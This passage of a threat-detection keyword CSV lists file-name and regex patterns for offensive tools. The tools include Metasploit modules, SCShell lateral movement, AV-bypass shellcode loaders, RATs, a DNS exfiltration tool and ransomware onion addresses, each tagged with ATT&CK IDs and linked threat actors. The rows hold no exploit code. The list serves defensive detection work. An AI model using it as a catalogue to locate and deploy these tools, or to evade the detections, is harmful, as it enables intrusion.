Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58228"
"*screetsec/Microsploit*",".{0,1000}screetsec\/Microsploit.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","N/A","5","439","121","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z","58229"
"*screetsec/Pateensy*",".{0,1000}screetsec\/Pateensy.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","58230"
"*screetsec/Sudomy*",".{0,1000}screetsec\/Sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","58231"
"*screetsec/Vegile*",".{0,1000}screetsec\/Vegile.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","#linux","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","58232"
"*--script broadcast-dhcp-discover*",".{0,1000}\-\-script\sbroadcast\-dhcp\-discover.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58233"
"*script/xor-bin.py*",".{0,1000}script\/xor\-bin\.py.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","58234"
"*script_main(wraith, cmdline)*",".{0,1000}script_main\(wraith,\scmdline\).{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","58235"
"*ScriptBlockSmuggling.ps1*",".{0,1000}ScriptBlockSmuggling\.ps1.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","1","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","58236"
"*scripthost_uac_bypass*",".{0,1000}scripthost_uac_bypass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58237"
"*scripts*Remote-WmiExecute.*",".{0,1000}scripts.{0,1000}Remote\-WmiExecute\..{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","58238"
"*scripts*Search-EventForUser.ps1*",".{0,1000}scripts.{0,1000}Search\-EventForUser\.ps1.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","58239"
"*scripts/ghauri.py*",".{0,1000}scripts\/ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","58240"
"*scripts/zoneadm.sh*",".{0,1000}scripts\/zoneadm\.sh.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","58241"
"*scripts\ghauri.py*",".{0,1000}scripts\\ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","58242"
"*ScriptSentry-main.zip*",".{0,1000}ScriptSentry\-main\.zip.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","58243"
"*ScRunBase32.exe*",".{0,1000}ScRunBase32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","58244"
"*ScRunBase32.py*",".{0,1000}ScRunBase32\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","58245"
"*ScRunBase64.exe*",".{0,1000}ScRunBase64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","58246"
"*ScRunBase64.py*",".{0,1000}ScRunBase64\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","58247"
"*scshell*XblAuthManager*",".{0,1000}scshell.{0,1000}XblAuthManager.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58248"
"*SCShell.exe*",".{0,1000}SCShell\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58249"
"*scshell.py*",".{0,1000}scshell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58250"
"*scshellbof.c*",".{0,1000}scshellbof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58251"
"*scshellbof.o*",".{0,1000}scshellbof\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58252"
"*scshellbofx64*",".{0,1000}scshellbofx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58253"
"*scumjr*dirtycow-vdso*",".{0,1000}scumjr.{0,1000}dirtycow\-vdso.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","58254"
"*sd6aq2r6jvuoeisrudq7jbqufjh6nck5buuzjmgalicgwrobgfj4lkqd.onion*",".{0,1000}sd6aq2r6jvuoeisrudq7jbqufjh6nck5buuzjmgalicgwrobgfj4lkqd\.onion.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","58255"
"*sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion*",".{0,1000}sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58256"
"*Search cached MSI files in C:/Windows/Installer/*",".{0,1000}Search\scached\sMSI\sfiles\sin\sC\:\/Windows\/Installer\/.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","58257"
